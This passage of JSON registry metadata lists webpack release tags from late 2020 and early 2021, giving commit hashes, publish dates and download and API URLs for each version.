ack/webpack/releases/tag/v4.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0/manifests"},{"name":"v5.12.3","sha":"a064b0ff3315db0d95124aaf5cc9b0a6add82926","kind":"tag","published_at":"2021-01-10T18:23:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3/manifests"},{"name":"v5.12.2","sha":"88610d738ff78fa3fb7f859ee284c632bca42a24","kind":"tag","published_at":"2021-01-09T08:27:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2/manifests"},{"name":"v5.12.1","sha":"62ec1546260d168cffd5dec8fc397c6e1159e4e4","kind":"tag","published_at":"2021-01-08T15:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1/manifests"},{"name":"v5.12.0","sha":"74c9c72b873b27ec552cd6b85a9b578d6698e102","kind":"tag","published_at":"2021-01-08T12:58:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0/manifests"},{"name":"v4.45.0","sha":"03313223fd4a0d4e570b8c79971e61b28cb3aeae","kind":"tag","published_at":"2021-01-08T12:53:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0/manifests"},{"name":"v5.11.1","sha":"98bcf44a43d0109ac2680487fddf3c3262395e1f","kind":"tag","published_at":"2020-12-28T18:06:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1/manifests"},{"name":"v5.11.0","sha":"f04328bad933fd9bacea389df17db96ffbd2336b","kind":"tag","published_at":"2020-12-17T15:59:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0/manifests"},{"name":"v5.10.3","sha":"10ad4e95b850bbe20019275fd1d364666c4b69ea","kind":"tag","published_at":"2020-12-15T20:00:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3/manifests"},{"name":"v5.10.2","sha":"c937292e6fb2e1e0a618d9d633f4184ec64cda75","kind":"tag","published_at":"2020-12-15T08:08:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2/manifests"},{"name":"v5.10.1","sha":"3f3d0138f9c18658be87d89d609fc7c6d286005f","kind":"tag","published_at":"2020-12-11T20:32:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1/manifests"},{"name":"v5.10.0","sha":"06e1cce1221ca717fc8efbaeca5ca71246f85a44","kind":"tag","published_at":"2020-12-04T19:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0/manifests"},{"name":"v5.9.0","sha":"0e7437dc3042874649919d4ffe005db13053c4ff","kind":"tag","published_at":"2020-11-28T21:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0/manifests"},{"name":"v5.8.0","sha":"fb7d09b315bbf3b5388eed0cc5e58309187a3acc","kind":"tag","published_at":"2020-11-26T17:58:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0/manifests"},{"name":"v5.7.0","sha":"4ba6d2ea67e9046cbba83f588989b3cadff7d911","kind":"tag","published_at":"2020-11-26T06:08:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0/manifests"},{"name":"v5.6.0","sha":"1936615458352f38ff517d258b936d690a7b631f","kind":"tag","published_at":"2020-11-19T12:18:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0/manifests"},{"name":"v5.5.1","sha":"a6ebce41059a029163a1774b35d81e0bfaa05b27","kind":"tag","published_at":"2020-11-18T12:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1/manifests"},{"name":"v5.5.0","sha":"3471c776059ac2d26593ea39f9c47c1874253dbb","kind":"tag","published_at":"2020-11-17T13:23:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0/manifests"},{"name":"v5.4.0","sha":"84dafd164499b6080243cf9d00537b47b6e075c2","kind":"tag","published_at":"2020-11-03T15:28:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0/manifests"},{"name":"v5.3.2","sha":"3df96f4a7843ef07794c31da8c7469dff133a228","kind":"tag","published_at":"2020-10-29T19:52:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2/manifests"},{"name":"v5.3.1","sha":"dfae6f0ac70e1f4ec6d25a853838d4aa58e10e1f","kind":"tag","published_at":"2020-10-28T21:07:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"ab555844701209492debf23cc3168a0efafb3251","kind":"tag","published_at":"2020-10-27T11:52:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0/manifests"},{"name":"v5.2.1","sha":"d09357b4008da750e0d90066b2cd9567edc27a61","kind":"tag","published_at":"2020-10-27T11:02:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"d42705c05dd62d562b759fb518f86c9854435df4","kind":"tag","published_at":"2020-10-22T16:59:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0/manifests"},{"name":"v5.1.3","sha":"c90dfadbc6c5ac1ab4bda2cc106958b65fb5e6e7","kind":"tag","published_at":"2020-10-16T13:36:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3/manifests"},{"name":"v5.1.2","sha":"83790375529c5b2967d45ed40700399e107d478f","kind":"tag","published_at":"2020-10-15T18:41:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2/manifests"},{"name":"v5.1.1","sha":"f2f998b58362d5edc9945a48f8245a3347ad007c","kind":"tag","published_at":"2020-10-15T13:08:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1/manifests"},{"name":"v5.1.0","sha":"77329b4d0e1aa35e26d8a32b2a8968a824b5de9c","kind":"tag","published_at":"2020-10-13T12:37:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"610f36817af1f1c6929786d68f734ac582af1757","kind":"tag","published_at":"2020-10-10T20:07:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0/manifests"},{"name":"v5.0.0-rc.6","sha":"75ecff262ef0c1953e0d13c0b6a06bdad7ccace5","kind":"tag","published_at":"2020-10-10T19:03:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6/manifests"},{"name":"v5.0.0-rc.5","sha":"57b493f6ff0bd55dddfbfc7ffc2f2680a7f82a6d","kind":"tag","published_at":"2020-10-09T22:38:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5/manifests"},{"name":"v5.0.0-rc.4","sha":"1755fe30224943bca80e14634b4cf3f876e529ef","kind":"tag","published_at":"2020-10-07T08:49:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4/manifests"},{"name":"v5.0.0-rc.3","sha":"ef38f322a963034271b76258beed35239760f526","kind":"tag","published_at":"2020-09-30T08:48:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3/manifests"},{"name":"v5.0.0-rc.2","sha":"d49b49ddebc6c06703e19ff6391915d2b09b0f2b","kind":"tag","published_at":"2020-09-29T18:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2/manifests"},{"name":"v5.0.0-rc.1","sha":"f60db1a079c7df48400637c54c547c161ed189da","kind":"tag","published_at":"2020-09-28T19:18:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1/manifests"},{"name":"v5.0.0-rc.0","sha":"658209c253287de9edee85293d23123d5183a873","kind":"tag","published_at":"2020-09-20T21:11:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0/manifests"},{"name":"v5.0.0-beta.33","sha":"dd3ec4f8072605479410ee7c13cb7a12688939d1","kind":"tag","published_at":"2020-09-20T21:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.33","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33/manifests"},{"name":"v5.0.0-beta.32","sha":"e81882adb2ca1a3cceb3dc28d4f73c09f013eb83","kind":"tag","published_at":"2020-09-18T18:08:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32/manifests"},{"name":"v4.44.2","sha":"2efeb4b5787e868e69233aa9dec469c200fa3b2c","kind":"tag","published_at":"2020-09-17T23:43:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2/manifests"},{"name":"v5.0.0-beta.31","sha":"ea492a530f83b35346986c374f8394814f187eb8","kind":"tag","published_at":"2020-09-17T13:43:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31/manifests"},{"name":"v5.0.0-beta.30","sha":"922c95e9b458e44b999aca2c45d9540079a225b2","kind":"tag","published_at":"2020-09-11T21:55:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30/manifests"},{"name":"v5.0.0-beta.29","sha":"7bc3a031996d17d859d7a5b077ce1c5ab5dc7e29","kind":"tag","published_at":"2020-08-28T19:21:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29/manifests"},{"name":"v5.0.0-beta.28","sha":"e32daa9be5fed184c8befac87216a88872f7df4a","kind":"tag","published_at":"2020-08-20T09:42:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28/manifests"},{"name":"v5.0.0-beta.27","sha":"3cdff531d77ee63251a385e3b6e3ccca2ec37a64","kind":"tag","published_at":"2020-08-19T20:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27/manifests"},{"name":"v5.0.0-beta.26","sha":"f2b68e0b77a3b4199c0d6989eeb69bd9a0bdb2ed","kind":"tag","published_at":"2020-08-14T19:06:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26/manifests"},{"name":"v5.0.0-beta.25","sha":"377348be6c32895a3d440b3643963f71c730aa85","kind":"tag","published_at":"2020-08-10T14:13:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25/manifests"},{"name":"v5.0.0-beta.24","sha":"bcc93305d8558285d30ea7142517491c3cdfd46c","kind":"tag","published_at":"2020-08-05T12:29:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.24","html_url"